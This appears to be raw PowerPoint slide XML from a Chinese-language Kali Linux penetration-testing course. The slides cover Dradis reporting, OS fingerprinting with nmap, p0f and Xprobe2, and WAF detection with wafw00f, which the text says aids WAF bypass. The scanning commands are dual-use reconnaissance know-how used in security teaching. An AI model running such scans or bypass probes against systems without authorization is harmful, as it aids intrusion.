            <a:off x="1049932" y="763975"/>
            <a:ext cx="10148712" cy="11460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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>同样，我们添加一个任何端口或服务的屏幕截图。转到</a:t>
            </a:r>
            <a:r>
              <a:t>“Attachment”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>选项卡，点击</a:t>
            </a:r>
            <a:r>
              <a:t>“Add”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>按钮，选择要上传的文件。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="933" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="1863" t="19720" r="3033" b="7873"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1416755" y="3332479"/>
            <a:ext cx="9852069" cy="4377805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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35" name="Shape 935"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049866" y="890975"/>
            <a:ext cx="10148712" cy="6380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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>点击</a:t>
            </a:r>
            <a:r>
              <a:t>“upload”</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>将文件上传到</a:t>
            </a:r>
            <a:r>
              <a:t>dradis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="936" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="694" t="20974" r="3033" b="5955"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497188" y="2521091"/>
            <a:ext cx="9704648" cy="4711450"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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38" name="Shape 938"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1049866" y="789375"/>
            <a:ext cx="10148712" cy="6380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defRPr sz="2800">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>双击上传后的图片，会在新的标签页中打开。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="939" name="image.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:srcRect l="694" t="20668" r="3033" b="3915"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1798884" y="3033315"/>
            <a:ext cx="9821930" cy="4312777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>
</p:sld>
</file>

<file path=ppt/slides/slide1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41" name="Shape 941"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1189848" y="2497102"/>
            <a:ext cx="10148713" cy="26033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1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>类似的，我们可以上传</a:t>
            </a:r>
            <a:r>
              <a:t>Nessus, Burp, Nikto, Owasp ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>等的扫描结果。</a:t>
            </a:r>
            <a:r>
              <a:t>Drais</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>可以根据上传的结果导出报告。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" defTabSz="1300480">
              <a:defRPr sz="2800">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>不幸的是</a:t>
            </a:r>
            <a:r>
              <a:t>doc</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:t>pdf</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>格式只在</a:t>
            </a:r>
            <a:r>
              <a:t>pro</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>版才可导出，社区版只允许导出</a:t>
            </a:r>
            <a:r>
              <a:t>Html</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>格式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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5" name="Shape 215"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590550" y="311149"/>
            <a:ext cx="3873500" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>操作系统指纹识别</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="216" name="Shape 216"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="947895" y="1200150"/>
            <a:ext cx="11353187" cy="2387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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>识别目标主机的操作系统，首先，可以帮助我们进一步探测操作系统级别的漏洞从而可以从这一级别进行渗透测试。其次，操作系统和建筑在本系统之上的应用一般是成套出现的，例如LAMP或者LNMP。操作系统的版本也有助于我们准确定位服务程序或者软件的版本，比如一般情况下windows server 2003 搭载的IIS为6.0，windows server 2008 R2 搭载的是IIS7.5。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="217" name="Shape 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="590143" y="4260849"/>
            <a:ext cx="2502713"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Banner抓取</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="218" name="Shape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="650085" y="5035549"/>
            <a:ext cx="11704630" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>banner抓取是应用程序指纹识别而不是操作系统指纹识别。Banner信息并不是操作系统本身的行为，是由应用程序自动返回的，比如apathe、exchange。而且很多时候并不会直接返回操作系统信息，幸运的话，可能会看到服务程序本身的版本信息，并以此进行推断。下图可以看出ftp服务器软件为FileZilla及版本等信息 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="219" name="image17.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518071" y="7250717"/>
            <a:ext cx="9321801" cy="2459308"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>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1" name="Shape 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="459015" y="565149"/>
            <a:ext cx="6092369" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用Nmap进行操作系统探测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="222" name="Shape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="439261" y="1352549"/>
            <a:ext cx="7452043"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500"/>
            </a:pPr>
            <a:r>
              <a:t>使用Nmap识别操作系统最简单的方法为使用-O参数</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="2500"/>
            </a:pPr>
            <a:r>
              <a:t>格式 nmap -O  URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="223" name="image18.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1625600" y="2508250"/>
            <a:ext cx="9246489" cy="6184900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2808286" y="8731250"/>
            <a:ext cx="5635626"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>从图中可以看到服务器操作系统为Linux</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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6" name="Shape 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="327246" y="768349"/>
            <a:ext cx="5492307" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用p0f进行操作系统探测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536563" y="2060104"/>
            <a:ext cx="10988132" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>p0f是一款被动探测工具，通过分析网络数据包来判断操作系统类型。同时p0f在网络分析方面功能强大，可以用它来分析NAT、负载均衡、应用代理等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="image19.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1130300" y="5868056"/>
            <a:ext cx="10300745" cy="2564088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097361" y="4792201"/>
            <a:ext cx="2072477"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>p0f -i eth0 –p</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Shape 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643174" y="3426152"/>
            <a:ext cx="9718052" cy="101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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>下面命令的含义为监听网卡eth0，并开启混杂模式。这样会监听到每一个网络连接，部分结果摘录如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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2" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="430579" y="539749"/>
            <a:ext cx="6606440" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>使用Xprobe2进行操作系统探测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="462234" y="1587500"/>
            <a:ext cx="10988132" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Xprobe2是一款使用ICMP消息进行操作系统探测的软件，探测结果可以和Nmap互为参照。但是该软件目前公开版本为2005年的版本，对老的操作系统探测结果较为准确。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="234" name="image20.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1682750" y="4770671"/>
            <a:ext cx="9356160" cy="1539408"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235" name="Shape 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="543380" y="3441699"/>
            <a:ext cx="3942439"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>简单用法：xprobe2 -v URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535463" y="7080250"/>
            <a:ext cx="9216073"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>抓取操作系统指纹的工具还有很多，如miranda等，不过多举例。</a:t>
            </a:r>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8" name="Shape 148"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530225" y="444500"/>
            <a:ext cx="11099800" cy="2159000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="6900"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="149" name="Shape 149"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1084312" y="2203450"/>
            <a:ext cx="10836176" cy="6286500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>渗透测试与Kali Linux</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>信息侦察</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>漏洞扫描</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>漏洞利用</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>维持访问</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>编写报告</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr sz="2800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>总结</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </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8" name="Shape 238"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="970279" y="328082"/>
            <a:ext cx="2029144" cy="76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lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>WAF检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="239" name="Shape 239"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1030763" y="1259945"/>
            <a:ext cx="10781012" cy="117485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l" defTabSz="914400">
              <a:defRPr sz="2000">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WafW00f</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>是</a:t>
            </a:r>
            <a:r>
              <a:t>Python</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>脚本，用于检测网络服务是否处于网络应用防火墙保护状态，极其有用。使用</a:t>
            </a:r>
            <a:r>
              <a:t>WafW00f</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:rPr>
              <a:t>检测网络服务器和网络传输之间是否存在网络应用防火墙，这不仅可以发展测试战略，而且还能开发出绕过网络应用防火墙的高级技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="240" name="Shape 240"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1003621" y="2604667"/>
            <a:ext cx="344836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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>简单用法 wafw00f URL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="241" name="image21.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="942413" y="3333329"/>
            <a:ext cx="11170689" cy="4344831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="242" name="Shape 242"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="891698" y="8259233"/>
            <a:ext cx="5729606"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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>从图中可以看到该网站处于Waf保护状态</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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4" name="Shape 244"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1689100"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>搜索引擎</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="245" name="Shape 245"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
